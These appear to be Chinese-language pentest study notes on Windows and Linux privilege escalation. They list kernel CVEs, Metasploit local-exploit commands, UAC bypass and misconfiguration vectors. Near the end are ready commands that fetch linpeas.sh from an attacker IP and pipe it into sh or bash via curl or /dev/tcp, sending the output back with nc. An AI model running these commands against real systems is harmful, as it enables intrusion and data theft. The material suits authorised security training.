Windows & Linux 核心提权方向:

  • 横向提权 (Lateral Movement): 获取同一级别不同用户 / 主机的权限。

  • 纵向提权 (Vertical Privilege Escalation / Privilege Escalation): 获取更高权限(如普通用户 -> 管理员 /root)。

Windows 权限提升

用户类型

  • Users - 普通用户

  • Administrator - 管理员用户 (注意拼写)

  • System - 系统用户 (最高权限之一,代表操作系统本身)

  • TrustedInstaller - 最高权限用户 (特定服务使用,文件 / 注册表所有者)

内核漏洞提权

CVE-2018-8120.exe

meterpreter > upload /home/kali/Desktop/CVE-2018-8120.exe C:\\users\\xxx\\Desktop\\CVE-2018-8120.exe
meterpreter > shell     【chcp 65001】
C:\Users\xxx\Desktop>CVE-2018-8120.exe "whoami"

永恒之黑

msf6 > search CVE-2020-0796
msf6 > use exploit/windows/local/cve_2020_0796_smbghost
msf6 exploit(windows/local/cve_2020_0796_smbghost) > set session 4

getsystem

错误配置提权

错误配置

注意架构问题

msf6 exploit(windows/local/cve_2020_0796_smbghost) > use exploit/windows/local/service_permissions
 msf6 exploit(windows/local/cve_2020_0796_smbghost) > set payload windows/x64/meterpreter/reverse_tcp

计划任务

注册表

DLL

数据库提权

绕过权限提权

bypassuac

use exploit/windows/local/bypassuac
 use exploit/windows/local/ask

CS 插件提权

辅助提权

靠山吃山

https://lolbas-project.github.io/#

windows-exploit-suggester.py

winPEAS.bat

其他

访问令牌提权

土豆攻击

Linux 权限提升

用户类型

  • root - 超级用户

  • sshd, www-data, mysql 等 - 服务用户 (权限受限)

  • kali, user 等 - 普通用户

内核提权

CVE-2016-5195

脏牛漏洞

CVE-2022-0847

脏管道

CVE-2021-4034

CVE-2024-1086

searchsploit 筛选

错误配置提权

crontab 计划任务提权

suid 提权

u+s

sudo 提权

辅助提权

靠山吃山

https://gtfobins.github.io/

谷歌搜索

https://www.exploit-db.com

优雅的运行 linpeas

1、落地执行
 最常规的方式 -> 上传/下载 -> 给权限 -> 运行 -> 查看结果  
 
 
 2、不落地执行
 目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh
 
 
 3、不落地执行,并将执行输出回攻击机
 目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh | nc 192.168.4.249 81
 
 
 4、不落地执行,并将执行输出回攻击机并且保存成文件
 攻击机:python3 -m http.server 12345
 攻击机:nc -lvvp 81 | tee linpeas-result
 目标设备:curl -l http://192.168.4.249:12345/linpeas.sh | sh | nc 192.168.4.249 81
 
 
 5、无wget/curl命令情况下执行
 攻击机:nc -lvnp 81 < linpeas.sh
 目标设备:cat < /dev/tcp/192.168.4.249/81 | bash

linux-exploit-suggester.sh